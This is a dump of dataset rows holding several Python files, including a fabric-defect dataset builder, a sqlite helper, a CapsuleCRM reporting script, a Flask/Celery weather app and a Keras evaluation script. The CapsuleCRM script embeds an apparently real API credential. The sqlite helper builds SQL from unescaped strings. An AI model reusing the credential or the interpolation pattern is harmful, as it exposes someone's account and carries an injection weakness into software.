seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
14265869744 | import os
from PIL import Image
from scipy.ndimage.filters import gaussian_filter
import cv2
import shutil # To copy the file
import sys
import numpy as np
import torch
from torchvision import transforms
from torch.utils.data import Dataset
import torch.nn.functional as F
import torchvision
from tqdm import tqdm
import urllib.request
import py7zr
import backbone as bb
# Directory layout of the prepared AITEX dataset.
aitex_folder = './datasets/AITEX/'
aitex_train_dir = aitex_folder + 'trainset/'
aitex_test_dir = aitex_folder + 'testset/'
aitex_mask_dir = aitex_folder + 'Mask_images/'
aitex_config_file = aitex_folder + 'config'  # records the 'resize' flag used when the dataset was built
Defect_path = aitex_folder + 'Defect_images/'      # raw defective strips (deleted after the build)
NODefect_path = aitex_folder + 'NODefect_images/'  # raw defect-free strips (deleted after the build)
CUT_PATCHES = 1  # extra whole patches kept left of the detected fabric edge
AITEX_CLASS_NAMES = ['00', '01', '02', '03', '04', '05', '06']
PATCH_SIZE = 256  # patch size
STRIDE = PATCH_SIZE  # stride of patch
ANOMALY_THRESHOLD = 0  # threshold to consider a patch as anomalous
class AitexDataSet(Dataset):
    """AITEX fabric-defect dataset of pre-cut 256x256 patches.

    Mirrors the MVTec-style dataset interface used elsewhere in the project:
    ``__getitem__`` yields ``(image_tensor, defective_flag, mask_tensor)``.
    """

    def __init__(self, class_name='03', resize=256, cropsize=224, is_train=True):
        # class_name selects one of the AITEX fabric classes ('00'..'06').
        self.is_train = is_train
        self.class_name = class_name
        self.resize = resize
        self.cropsize = cropsize
        # ImageNet normalization constants — patches feed a pretrained backbone.
        # NOTE(review): Image.ANTIALIAS is deprecated in newer Pillow; confirm
        # the pinned Pillow version still exposes it.
        self.transform = transforms.Compose([transforms.Resize(resize, Image.ANTIALIAS),
                                             transforms.CenterCrop(cropsize),
                                             transforms.ToTensor(),
                                             transforms.Normalize(mean=[0.485, 0.456, 0.406],
                                                                  std=[0.229, 0.224, 0.225])])
        # Masks are resized with nearest-neighbour so labels stay binary.
        self.transform_mask = transforms.Compose([transforms.Resize(resize, Image.NEAREST),
                                                  transforms.CenterCrop(cropsize),
                                                  transforms.ToTensor()])
        self.main_dir = aitex_train_dir + self.class_name + '/' if self.is_train else aitex_test_dir + self.class_name + '/'
        self.all_imgs = sorted(os.listdir(self.main_dir))
        self.mask_dir = aitex_mask_dir
        if not self.is_train:
            self.all_mask = sorted(os.listdir(self.mask_dir))

    def __len__(self):
        # Number of patches available for this class/split.
        return len(self.all_imgs)

    def __getitem__(self, idx):
        """Return ``(image, defective, mask)`` for patch *idx*.

        ``defective`` is 1 when the mask's pixel sum exceeds
        ANOMALY_THRESHOLD, else 0. Patches without a mask file on disk are
        treated as defect-free and get an all-zero mask.
        """
        img_loc = os.path.join(self.main_dir, self.all_imgs[idx])
        image = Image.open(img_loc).convert('RGB')
        tensor_image = self.transform(image)  # x in mvtec class
        mask_name = self.all_imgs[idx].replace('.png', '_mask.png')
        if os.path.isfile(self.mask_dir + '/' + mask_name):
            mask_loc = os.path.join(self.mask_dir, mask_name)
            mask = Image.open(mask_loc).convert('L')
            tensor_mask = self.transform_mask(mask)  # mask in mvtec class
        else:
            tensor_mask = torch.zeros([1, self.cropsize, self.cropsize])
        if int(torch.sum(tensor_mask)) > ANOMALY_THRESHOLD:  # y in mvtec class
            defective = 1
        else:
            defective = 0
        return tensor_image, defective, tensor_mask

    def getName(self, idx, mask=False):
        """Return the file name of patch *idx* (or of its mask when *mask*)."""
        if mask:
            return self.all_imgs[idx].replace('.png', '_mask.png')
        else:
            return self.all_imgs[idx]
def resizeAitex(dataset, original_width=4096, original_height=256):
    """Crop the empty left region off an AITEX fabric strip.

    Runs Canny edge detection, finds the column where the edge density rises
    most steeply, rounds that column up to a whole number of patches
    (plus CUT_PATCHES extra) and crops everything left of it.

    :param dataset: 1xHxW single-channel image tensor
    :param original_width: width of the raw strip in pixels
    :param original_height: height of the raw strip in pixels
    :return: (cropped tensor, new width, new height)
    """
    img_ = dataset.squeeze(0).numpy()
    img_ = cv2.normalize(img_, None, alpha=0, beta=255,
                         norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_32F)
    img_ = img_.astype(np.uint8)
    # Blur the image for better edge detection
    img_blur = cv2.GaussianBlur(img_, (3, 3), sigmaX=0, sigmaY=0)
    # Canny Edge Detection
    edges = cv2.Canny(image=img_blur, threshold1=100, threshold2=200)
    # Edge mass per column — vectorized; the original Python double loop was
    # O(width*height) per call for the same result.
    vector = edges[:original_height, :original_width].sum(axis=0, dtype=np.float64)
    derivative = np.gradient(vector)
    # Renamed from 'max', which shadowed the builtin.
    max_col = np.argmax(derivative)
    cut = (int(max_col / PATCH_SIZE) + CUT_PATCHES) * PATCH_SIZE
    crop_img = transforms.functional.crop(dataset, top=0, left=cut,
                                          height=original_height,
                                          width=(original_width - cut))
    new_widths = crop_img.shape[2]
    new_heights = crop_img.shape[1]
    return crop_img, new_widths, new_heights
# --------------- Functions for patches ---------------
def DivideInPatches(img, size, stride):
    """Split a CxHxW tensor into square tiles of side *size*.

    Tiles are taken row-major with the given *stride*; the result has shape
    (num_patches, C, size, size).
    """
    tiles = img.unfold(1, size, stride)
    tiles = tiles.unfold(2, size, stride)
    flat = tiles.contiguous().view(tiles.size(0), -1, size, size)
    return flat.permute(1, 0, 2, 3)
def countAitexAnomalies():
    """Scan every mask patch on disk and report which ones contain a defect.

    :return: (number_of_defects, defective) where defective[i] says whether
        the i-th mask (sorted by file name) exceeds ANOMALY_THRESHOLD.
    """
    to_tensor = transforms.ToTensor()
    defective = []
    for mask_name in sorted(os.listdir(aitex_mask_dir)):
        mask_img = Image.open(os.path.join(aitex_mask_dir, mask_name)).convert('L')
        defective.append(int(torch.sum(to_tensor(mask_img))) > ANOMALY_THRESHOLD)
    return sum(defective), defective
# --------------- Functions to create Aitex Dataset ---------------
def Reformat_Image(ImageFilePath, new_width, new_height, color, offset):
    """Pad the image at *ImageFilePath* onto a new_width x new_height canvas
    and overwrite the file in place.

    :param color: background fill, 'white' or 'black'
    :param offset: 'center', 'right' or 'left' placement of the original.
        NOTE(review): 'right' pastes at (0, 0) and 'left' pastes at the
        bottom-right corner — the names look inverted relative to the
        geometry; confirm against the callers (the padded strip is flipped
        afterwards in CreateAitexDataset).
    """
    image = Image.open(ImageFilePath, 'r')
    image_size = image.size
    width = image_size[0]
    height = image_size[1]
    if color == 'white':
        color = (255, 255, 255, 255)
    elif color == 'black':
        color = (0, 0, 0, 255)
    if offset == 'center':
        offset = (int(round(((new_width - width) / 2), 0)), int(round(((new_height - height) / 2), 0)))
    elif offset == 'right':
        offset = (0, 0)
    elif offset == 'left':
        offset = ((new_width - width), (new_height - height))
    # RGBA canvas; the original image is pasted on top, then saved back
    # over the same path.
    background = Image.new('RGBA', (new_width, new_height), color)
    background.paste(image, offset)
    background.save(ImageFilePath)
def DeleteFolder(path):
    """Recursively delete the directory tree rooted at *path*."""
    shutil.rmtree(path)
def MergeMasks(name):
    """Merge '<name>_mask1.png' and '<name>_mask2.png' into a single
    '<name>_mask.png', then delete the two partial masks.
    """
    mask1 = Image.open(name + '_mask1.png').convert('L')
    mask2 = Image.open(name + '_mask2.png').convert('L')
    # Widen to uint16 before adding: np.add on uint8 wraps on overlapping
    # defect pixels (e.g. 255 + 255 -> 254), which would punch near-black
    # holes into the merged mask. Clip back into the 8-bit range instead.
    mask1 = np.array(mask1, dtype=np.uint16)
    mask2 = np.array(mask2, dtype=np.uint16)
    mask = np.clip(mask1 + mask2, 0, 255).astype(np.uint8)
    mask = Image.fromarray(mask)
    mask.save(name + '_mask.png', "png")
    os.remove(name + '_mask1.png')
    os.remove(name + '_mask2.png')
def BinarizeMasks(Mask_path):
    """Threshold every mask image in *Mask_path* to pure {0, 255},
    overwriting the files in place."""
    thresh = 128
    maxval = 255
    all_imgs = sorted(os.listdir(Mask_path))
    for i in all_imgs:
        im_gray = np.array(Image.open(Mask_path + i).convert('L'))
        # Boolean comparison scaled to {0, maxval}.
        im_bin = (im_gray > thresh) * maxval
        Image.fromarray(np.uint8(im_bin)).save(Mask_path + i)
def RenameFolder(oldname, newname):
    """Rename a file or directory from *oldname* to *newname*."""
    os.rename(oldname, newname)
def FlipImage(filename):
    """Mirror the image at *filename* horizontally and overwrite the file."""
    image = Image.open(filename)
    image = np.fliplr(image)
    Image.fromarray(np.uint8(image)).save(filename)
def CreateAitexDataset(resize, log_file):
    """Build the patch-based AITEX dataset from the raw downloaded archives.

    Splits every 4096x256 strip into PATCH_SIZE patches, organising them into
    trainset/<class> (defect-free) and testset/<class> (defective strips plus
    one held-out good strip per class), and cuts the masks into matching
    patches. On any failure the dataset folder is wiped and the process exits.

    :param resize: when True, crop the empty left region of each strip first
        (see resizeAitex) before patching
    :param log_file: log destination passed to backbone.myPrint
    """
    try:
        bb.myPrint("Preparing the AITEX dataset...", log_file)
        # Maps the raw AITEX fabric folder names to two-digit class labels.
        NODefect_subdirectories = {
            '2311694-2040n7u': '00',
            '2608691-202020u': '01',
            '2306894-210033u': '02',
            '2311694-1930c7u': '03',
            '2311517-195063u': '04',
            '2306881-210020u': '05',
            '2311980-185026u': '06'
        }
        os.makedirs(aitex_train_dir, exist_ok=True)
        os.makedirs(aitex_test_dir, exist_ok=True)
        # Rename the raw class folders to their labels and create the
        # per-class output directories.
        for i in range(len(NODefect_subdirectories)):
            RenameFolder(NODefect_path + list(NODefect_subdirectories.keys())[i], NODefect_path + list(NODefect_subdirectories.values())[i])
            os.makedirs(aitex_train_dir + list(NODefect_subdirectories.values())[i], exist_ok=True)
            os.makedirs(aitex_test_dir + list(NODefect_subdirectories.values())[i], exist_ok=True)
        # Two defective images ship with two partial masks each.
        MergeMasks(aitex_mask_dir + '0044_019_04')  # Merge and delete 0044_019_04.png masks
        MergeMasks(aitex_mask_dir + '0097_030_03')  # Merge and delete 0097_030_03.png masks
        BinarizeMasks(aitex_mask_dir)
        # 0094_027_05 is narrower than 4096px: pad it (white image / black
        # mask) and mirror it so the padding ends up on the left side.
        Reformat_Image(Defect_path + '0094_027_05.png', 4096, 256, 'white', 'right')
        Reformat_Image(aitex_mask_dir + '0094_027_05_mask.png', 4096, 256, 'black', 'right')
        # 0100_025_08 has no usable mask/class; dropped from the dataset.
        os.remove(Defect_path + '0100_025_08.png')
        FlipImage(Defect_path + '0094_027_05.png')
        FlipImage(aitex_mask_dir + '0094_027_05_mask.png')
        defect_images = os.listdir(Defect_path)
        # NOTE(review): nodefect_images is built but never used below, and it
        # joins with the *old* (pre-rename) folder names.
        nodefect_images = []
        for i in range(len(NODefect_subdirectories)):
            for j in os.listdir(NODefect_path + list(NODefect_subdirectories.values())[i]):
                nodefect_images.append(list(NODefect_subdirectories.keys())[i] + '/' + j)
        # Sort defective strips into per-class subfolders of Defect_path;
        # file names end with '<class>.png'.
        for i in range(len(NODefect_subdirectories)):
            new_folder = Defect_path + list(NODefect_subdirectories.values())[i] + '/'
            os.makedirs(new_folder, exist_ok=True)
            for img in defect_images:
                if list(NODefect_subdirectories.values())[i] + '.png' in img:
                    shutil.move(Defect_path + img, new_folder + img)
        # Park the raw masks aside; aitex_mask_dir will receive mask patches.
        Mask_path_temp = aitex_folder + '/Mask_images_temp/'
        RenameFolder(aitex_mask_dir, Mask_path_temp)
        os.makedirs(aitex_mask_dir, exist_ok=True)
        # Move one defect-free strip per class into the test set so the test
        # split also contains good samples.
        for i in range(len(NODefect_subdirectories)):
            last_image = os.listdir(NODefect_path + list(NODefect_subdirectories.values())[i] + '/')[-1]
            new_folder = Defect_path + list(NODefect_subdirectories.values())[i] + '/' + last_image
            old_folder = NODefect_path + list(NODefect_subdirectories.values())[i] + '/' + last_image
            shutil.move(old_folder, new_folder)
        transform = transforms.Compose([
            transforms.ToTensor()
        ])
        for i in range(len(NODefect_subdirectories)):
            # --- training split: defect-free strips, cut into patches ---
            train_folder_temp = NODefect_path + list(NODefect_subdirectories.values())[i] + '/'
            all_train_imgs = sorted(os.listdir(train_folder_temp))
            for img in all_train_imgs:
                img_loc = os.path.join(train_folder_temp, img)
                image = Image.open(img_loc).convert('L')
                tensor_image = transform(image)
                if resize:
                    tensor_image, _, _ = resizeAitex(tensor_image)
                train_patches = DivideInPatches(tensor_image, PATCH_SIZE, STRIDE)
                for idx, patch in enumerate(train_patches):
                    name = img.replace('.png', '_' + str(idx) + '.png')
                    name = os.path.join(aitex_train_dir + list(NODefect_subdirectories.values())[i] + '/', name)
                    torchvision.utils.save_image(patch, name)
            # --- test split: defective strips + their masks, same cut ---
            test_folder_temp = Defect_path + list(NODefect_subdirectories.values())[i] + '/'
            all_test_imgs = sorted(os.listdir(test_folder_temp))
            for img in all_test_imgs:
                img_loc = os.path.join(test_folder_temp, img)
                image = Image.open(img_loc).convert('L')
                tensor_image = transform(image)
                if resize:
                    tensor_image, new_widths, _ = resizeAitex(tensor_image)
                test_patches = DivideInPatches(tensor_image, PATCH_SIZE, STRIDE)
                for idx, patch in enumerate(test_patches):
                    name = img.replace('.png', '_' + str(idx) + '.png')
                    name = os.path.join(aitex_test_dir + list(NODefect_subdirectories.values())[i] + '/', name)
                    torchvision.utils.save_image(patch, name)
                mask_name = img.replace('.png', '_mask.png')
                if os.path.isfile(Mask_path_temp + mask_name):
                    mask_loc = os.path.join(Mask_path_temp, mask_name)
                    mask = Image.open(mask_loc).convert('L')
                    tensor_mask = transform(mask)
                else:
                    # Defect-free test strip: synthesize an all-zero mask.
                    tensor_mask = torch.zeros([1, 256, 4096])
                if resize:
                    # Crop the mask from the right edge to match the image crop.
                    tensor_mask = transforms.functional.crop(tensor_mask, top=0, left=(4096 - new_widths), height=256, width=new_widths)
                test_masks = DivideInPatches(tensor_mask, PATCH_SIZE, STRIDE)
                for idx, patch in enumerate(test_masks):
                    name = mask_name.replace('_mask.png', '_' + str(idx) + '_mask.png')
                    name = os.path.join(aitex_mask_dir, name)
                    torchvision.utils.save_image(patch, name)
        # Raw material is no longer needed once the patches are written.
        DeleteFolder(Defect_path)
        DeleteFolder(NODefect_path)
        DeleteFolder(Mask_path_temp)
        # Record the resize flag so prepareAitex can detect a mismatch later.
        f = open(aitex_config_file, "a")
        f.write(str(resize))
        f.close()
    except Exception as e:
        bb.myPrint(e, log_file)
        bb.myPrint("Error in CreateAitexDataset function!", log_file)
        DeleteFolder(aitex_folder)
        sys.exit(-1)
def prepareAitex(resize, log_file):
    """Ensure the AITEX dataset exists on disk with the requested *resize*
    setting.

    Reuses an already-prepared dataset when its recorded config matches;
    otherwise wipes the folder and rebuilds from a fresh download.
    """
    if os.path.isdir(aitex_folder):
        prepared = (os.path.isdir(aitex_train_dir)
                    and os.path.isdir(aitex_test_dir)
                    and os.path.isdir(aitex_mask_dir))
        if prepared:
            f = open(aitex_config_file, "r")
            stored = f.readline()
            f.close()
            if resize == (stored == "True"):
                # Dataset already built with the requested setting.
                return
        # Wrong config or half-built dataset: start over.
        DeleteFolder(aitex_folder)
    download(log_file)
    CreateAitexDataset(resize, log_file)
# --------------- Functions to download Aitex Dataset ---------------
# Base URL and archive names for the raw AITEX fabric dataset download.
URL = 'https://www.aitex.es/wp-content/uploads/2019/07/'
ARCHIVES = [
    'Defect_images.7z',
    'NODefect_images.7z',
    'Mask_images.7z'
]
def download(log_file):
    """Download and extract the three raw AITEX archives into aitex_folder.

    Already-present archive files are not re-downloaded. Exits the process
    when anything fails.
    """
    bb.myPrint("Download AITEX dataset...", log_file)
    os.makedirs(aitex_folder, exist_ok=True)
    try:
        for idx in range(len(ARCHIVES)):
            # Skip the download when the archive already exists on disk.
            if not os.path.isfile(aitex_folder + ARCHIVES[idx]):
                download_url(URL + ARCHIVES[idx], aitex_folder + ARCHIVES[idx])
            with py7zr.SevenZipFile(aitex_folder + ARCHIVES[idx], mode='r') as z:
                z.extractall(path=aitex_folder)
            # Archive no longer needed after extraction.
            os.remove(aitex_folder + ARCHIVES[idx])
        return
    except Exception as e:
        bb.myPrint(str(e), log_file)
        bb.myPrint("Can't download AITEX dataset. Retry later.", log_file)
        sys.exit(-1)
class DownloadProgressBar(tqdm):
    """tqdm progress bar adapted for use as a urllib ``reporthook``."""

    def update_to(self, b=1, bsize=1, tsize=None):
        """Reporthook callback.

        :param b: number of blocks transferred so far
        :param bsize: size of each block in bytes
        :param tsize: total size in bytes, when known
        """
        if tsize is not None:
            self.total = tsize
        # tqdm.update takes an increment; subtract what was already counted.
        self.update(b * bsize - self.n)
def download_url(url, output_path):
    """Download *url* to *output_path*, showing a progress bar named after
    the remote file."""
    with DownloadProgressBar(unit='B', unit_scale=True, miniters=1, desc=url.split('/')[-1]) as t:
        urllib.request.urlretrieve(url, filename=output_path, reporthook=t.update_to)
{
"api_name": "torch.utils.data.Dataset",
"line_number": 37,
"usage_type": "name"
},
{
"api_name": "torchvision.transforms.Compose",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms",
"line_number": 43,
"usage_type": "name"
},
{
"ap... |
72692990823 | import sqlite3
class Db:
    """
    Thin wrapper around a sqlite3 connection that returns rows as dicts.
    """

    def __init__(self, database):
        # check_same_thread=False: the connection may be used from the
        # web server's worker threads.
        self.conn = sqlite3.connect(database, check_same_thread=False)
        self.conn.row_factory = sqlite3.Row
        self.cursor = self.conn.cursor()

    def execute(self, query):
        """Run *query* and commit immediately."""
        self.cursor.execute(query)
        self.conn.commit()

    def fetchall(self, query):
        """Run *query* and return every row as a plain dict."""
        self.cursor = self.conn.cursor()
        self.execute(query)
        return [dict(row) for row in self.cursor.fetchall()]

    def close(self):
        """Close the underlying connection."""
        self.conn.close()

    def setup(self, data):
        """Create both tables, then load each (csv_path, table) pair in *data*."""
        self.create_classes_table()
        self.create_animals_table()
        for d in data:
            self.insert_data_from_csv(d[0], d[1])

    def create_animals_table(self):
        """Create the animals table (class_type references classes.id)."""
        self.execute('''
        create table animals
        (id integer not null, animal_name text, hair integer, feathers integer, eggs integer, milk integer, airborne integer,
        aquatic integer, predator integer, toothed integer, backbone integer, breathes integer, venomous integer,
        fins integer, legs integer, tail integer, domestic integer, catsize integer, class_type integer,
        primary key (id), foreign key (class_type) references classes(id))''')

    def create_classes_table(self):
        """Create the classes lookup table."""
        self.execute('''
        create table classes
        (id integer not null, number_of_animal_species_in_class integer, class_type text,
        primary key (id))
        ''')

    def insert_data_from_csv(self, csv_path, table):
        """Bulk-insert the rows of *csv_path* (header skipped) into *table*.

        NOTE(review): values are interpolated straight into the SQL string;
        only safe for trusted, comma-free CSV input.
        """
        with open(csv_path, 'r') as file:
            next(file)
            for line in file:
                fields = line.strip().split(',')
                # Quote the first two columns when they are not numeric.
                for col in (0, 1):
                    if not fields[col].isdigit():
                        fields[col] = f"'{fields[col]}'"
                self.execute(f'insert into {table} values (null, {", ".join(fields)})')
# def add_foreign_key(self, table, foreign_key, ref_table, ref_column):
# query = f'''
# alter table {table}
# add foreign key ({foreign_key}) references {ref_table}({ref_column})'''
# print(query)
# self.execute(query)
| madeleinema-cee/think-of-an-animal-flask | db.py | db.py | py | 2,372 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sqlite3.connect",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "sqlite3.Row",
"line_number": 11,
"usage_type": "attribute"
}
] |
29649845397 | import urllib3
import urllib.request
import base64
import json
import pandas as pd
from tabulate import tabulate
import codecs
import numpy as np
# --- Fetch opportunities from the CapsuleCRM API with HTTP basic auth ---
url = 'https://infeci.capsulecrm.com/api/opportunity'
headers = {}
# base64.encodestring was deprecated and removed in Python 3.9;
# encodebytes is the drop-in replacement with identical output.
base64string = base64.encodebytes(('2d486e42771eee18125b8aef3afe216d:4c2TNRdi').encode()).decode().replace('\n', '')
headers['Authorization'] = "Basic %s" % base64string
headers['Accept'] = "application/json"
req = urllib.request.Request(url, headers=headers)
resp = urllib.request.urlopen(req)
# Decode the byte stream as UTF-8 before handing it to the JSON parser.
reader = codecs.getreader("utf-8")
data = json.load(reader(resp))
print(data)
# Creamos el CSV con las oportunidades
# atributos = ['name','probability','expectedCloseDate','createdOn','updatedOn','value','currency','partyId','milestoneId','milestone','owner','id','durationBasis']
# s = ""
# for atr in atributos:
# s = s + atr + ","
# s = s + "\n"
# for op in data['opportunities']['opportunity']:
# for atr in atributos:
# s = s + op[atr] + ","
# s = s + "\n"
#
# text_file = open("oportunidades.csv", "w")
# text_file.write(s)
# text_file.close()
# Load the exported opportunities and print the raw table.
data = pd.read_csv('oportunidades.csv')
print(tabulate(data, headers='keys', tablefmt='psql'))
# 1 - Global status of submitted opportunities, grouped by milestone.
# http://pbpython.com/pandas-pivot-table-explained.html
print("\tESTADO GLOBAL DE LAS OPORTUNIDADES")
data = pd.read_csv('oportunidades.csv')
df = data
# Keep only milestone, value and margen (drop the other columns by position).
df = df.drop(df.columns[[0, 1, 2, 3, 4, 6, 7, 8, 10, 11, 12]], axis=1)
df['benef'] = df['value'] * df['margen'] / 100
pt = df.groupby(['milestone']).sum()
# Recompute the aggregated margin as a value-weighted percentage.
pt['margen'] = 100 * pt['benef'] / pt['value']
print(tabulate(pt, headers='keys', tablefmt='psql'))
print("\tValor Total: %s" % data['value'].sum())
# 2 - Upcoming offers: milestone 'New', ordered by expected close date.
# http://pbpython.com/pandas-pivot-table-explained.html
print("\n\n")
print("\tPROXIMAS OFERTAS A PRESENTAR")
data = pd.read_csv('oportunidades.csv')
df = data
df['benef'] = df['value'] * df['margen'] / 100
df = (df[df['milestone'] == 'New'])
df = df.sort_values('expectedCloseDate')
df = df.drop(df.columns[[1, 3, 4, 6, 7, 8, 10, 11, 12, 13, 14]], axis=1)
print(tabulate(df, headers='keys', tablefmt='psql'))
# 3 - Same 'New' selection again, printing the full frame for inspection.
# http://pbpython.com/pandas-pivot-table-explained.html
print("\n\n")
print("\tANALIZANDO...")
data = pd.read_csv('oportunidades.csv')
df = data
df['benef'] = df['value'] * df['margen'] / 100
df = (df[df['milestone'] == 'New'])
df = df.sort_values('expectedCloseDate')
print(df)
df = df.drop(df.columns[[1, 3, 4, 6, 7, 8, 10, 11, 12, 13, 14]], axis=1)
print(tabulate(df, headers='keys', tablefmt='psql'))
# {u'name': u'Definici\xf3n de Tarjeta de Transporte', u'probability': u'10', u'expectedCloseDate': u'2016-09-15T00:00:00Z',
# u'createdOn': u'2016-08-17T09:48:26Z', u'updatedOn': u'2016-08-17T11:29:53Z', u'value': u'95000.00', u'currency': u'EUR',
# u'partyId': u'115869164', u'milestoneId': u'405855', u'milestone': u'New', u'owner': u'rubenglezant', u'id': u'4609271',
# u'durationBasis': u'FIXED'}
# response = urllib2.urlopen('https://api.instagram.com/v1/tags/pizza/media/XXXXXX')
# curl -u 2d486e42771eee18125b8aef3afe216d:4c2TNRdi https://infeci.capsulecrm.com/api/party | rubenglezant/playBetterBets | Python-Bolsa/reportCRM/buildReport.py | buildReport.py | py | 3,230 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "base64.encodestring",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "urllib.request.request.Request",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "urllib.request.request",
"line_number": 17,
"usage_type": "attribute"
},
{
"ap... |
34715801253 | from __future__ import absolute_import
from os import environ
import json
from flask import Flask, jsonify, request
import settings
from celery import Celery
import urllib2
app = Flask(__name__)
app.config.from_object(settings)
'''
==========================================
============= CELERY Section =============
==========================================
'''
def make_celery(app):
    """Create a Celery app bound to *app*'s config, whose tasks run inside
    the Flask application context (so they can read app.config)."""
    celery = Celery(app.import_name, backend='amqp', broker=app.config['CELERY_BROKER_URL'])
    celery.conf.update(app.config)
    TaskBase = celery.Task

    class ContextTask(TaskBase):
        # Abstract base: not registered as a task itself.
        abstract = True

        def __call__(self, *args, **kwargs):
            # Push the Flask app context around every task invocation.
            with app.app_context():
                return TaskBase.__call__(self, *args, **kwargs)

    celery.Task = ContextTask
    return celery
celery = make_celery(app)
@celery.task(name='tasks.currentHomeTemp')
def currentHomeTemp():
    """Fetch the current temperature for Whitesboro, NY from the
    Weather Underground API and return it as a formatted string.
    (Python 2 style: uses urllib2.)"""
    f = urllib2.urlopen('http://api.wunderground.com/api/'
                        + app.config['WUNDERGROUND_KEY']
                        + '/geolookup/conditions/q/NY/Whitesboro.json')
    json_string = f.read()
    parsed_json = json.loads(json_string)
    location = parsed_json['location']['city']
    temp_f = parsed_json['current_observation']['temp_f']
    f.close()
    return "Current temperature in %s is: %s" % (location, temp_f)
@celery.task(name='tasks.currentZipcodeTemp')
def currentZipcodeTemp(zipcode):
    """Fetch the current temperature for *zipcode* from the Weather
    Underground API and return it as a formatted string."""
    endpoint = ('http://api.wunderground.com/api/'
                + app.config['WUNDERGROUND_KEY']
                + '/geolookup/conditions/q/' + zipcode + '.json')
    response = urllib2.urlopen(endpoint)
    payload = json.loads(response.read())
    response.close()
    temp_f = payload['current_observation']['temp_f']
    return "Current temperature at zipcode %s is: %s" % (zipcode, temp_f)
@celery.task(name="tasks.add")
def add(x, y):
return x + y
'''
==========================================
============= FLASK Section ==============
==========================================
'''
@app.route('/')
@app.route('/myassistant')
@app.route('/myassistant/index')
@app.route('/myassistant/index.html')
def index():
    """Landing page served for every index-style URL."""
    return 'Hello World!!'
@app.route("/myassistant/test")
def hello_world(x=16, y=16):
x = int(request.args.get("x", x))
y = int(request.args.get("y", y))
res = add.apply_async((x, y))
return generateTaskIdJson(res)
@app.route("/myassistant/result/<task_id>")
def show_result(task_id):
retval = add.AsyncResult(task_id).get(timeout=1.0)
return repr(retval)
@app.route('/myassistant/weather/home/temp/current')
def homeWeather():
    """Queue the home-town temperature task and return its id as JSON."""
    res = currentHomeTemp.apply_async()
    return generateTaskIdJson(res)
@app.route('/myassistant/weather/<zipcode>/temp/current')
def currentTempAtZip(zipcode):
    """Queue a temperature lookup for *zipcode* and return its id as JSON."""
    res = currentZipcodeTemp.delay(zipcode)
    return generateTaskIdJson(res)
'''
==========================================
=========== UTILITY Section ==============
==========================================
'''
def generateTaskIdJson(taskResult):
    """Build the JSON response for a queued task: its id plus the polling
    URL the client should hit for the result."""
    poll_url = 'http://{0}:{1}/myassistant/result/{2}'.format(
        app.config['CALLBACK_IP'],
        app.config['CALLBACK_PORT'],
        taskResult.task_id,
    )
    return jsonify({"id": taskResult.task_id, "url": poll_url})
'''
==========================================
============== MAIN Section ==============
==========================================
'''
if __name__ == "__main__":
port = int(environ.get("PORT", app.config['LISTEN_PORT']))
app.run(host=app.config['LISTEN_ADDRESS'], port=port, debug=True) | elihusmails/myassistant | src/app/tasks.py | tasks.py | py | 3,707 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "celery.Celery",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "celery.conf.update",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "celery.conf",
"line_n... |
29335693587 | from keras.models import load_model
from sklearn.metrics import confusion_matrix
import itertools
import numpy as np
import matplotlib.pyplot as plt
import sys
import csv
def load_data(train_data_path):
    """Load the training CSV of (label, space-separated pixel string) rows.

    :param train_data_path: path to the big5-encoded CSV file (header row
        is skipped)
    :return: tuple (X, Y) where X has shape (N, 48, 48, 1) and Y is the
        integer label array
    """
    X_train = []
    Y_train = []
    # 'with' guarantees the file handle is closed; the original leaked it.
    with open(train_data_path, 'r', encoding='big5') as text:
        row = csv.reader(text, delimiter=",")
        for i, r in enumerate(row):
            if i == 0:
                continue  # skip header
            Y_train.append(int(r[0]))
            X_train.append(r[1].split())
    return (np.reshape(np.array(X_train, dtype='int'), (len(X_train), 48, 48, 1)),
            np.array(Y_train, dtype='int'))
def split_valid_set(X_all, Y_all, percentage):
    """Return the validation tail of (X_all, Y_all).

    The first ``int(len(X_all) * percentage)`` samples are skipped; only the
    remaining slice is returned. (The head split was computed but never used
    in the original — dead locals removed.)

    :param percentage: fraction of samples to drop from the front
    :return: (X_valid, Y_valid)
    """
    valid_data_size = int(len(X_all) * percentage)
    X_valid, Y_valid = X_all[valid_data_size:], Y_all[valid_data_size:]
    return X_valid, Y_valid
def plotconfusionmatrix(cm, classes,
                        title='Confusion matrix',
                        cmap=plt.cm.jet):
    """
    This function prints and plots the confusion matrix.

    :param cm: raw confusion matrix (counts); row-normalized here so each
        true class sums to 1
    :param classes: tick labels for both axes
    """
    cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
    plt.imshow(cm, interpolation='nearest', cmap=cmap)
    plt.title(title)
    plt.colorbar()
    tick_marks = np.arange(len(classes))
    plt.xticks(tick_marks, classes, rotation=45)
    plt.yticks(tick_marks, classes)
    # Annotate each cell; flip text colour for contrast on dark cells.
    thresh = cm.max() / 2.
    for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
        plt.text(j, i, '{:.2f}'.format(cm[i, j]), horizontalalignment="center",
                 color="white" if cm[i, j] > thresh else "black")
    plt.tight_layout()
    plt.ylabel('True label')
    plt.xlabel('Predicted label')
def main():
    """Load a trained classifier, evaluate it on a held-out slice of the
    training data and plot the resulting confusion matrix."""
    model_path = 'check_point/' + sys.argv[1]
    train_data_path = 'data/train.csv'
    dev_feats, te_labels = load_data(train_data_path)
    dev_feats, te_labels = split_valid_set(dev_feats, te_labels, 0.01)
    emotion_classifier = load_model(model_path)
    np.set_printoptions(precision=2)
    predictions = emotion_classifier.predict(dev_feats)
    predictions = predictions.argmax(axis=-1)
    print(predictions)
    print(te_labels)
    conf_mat = confusion_matrix(te_labels, predictions)
    plt.figure()
    # Bug fix: the helper defined above is 'plotconfusionmatrix'; the
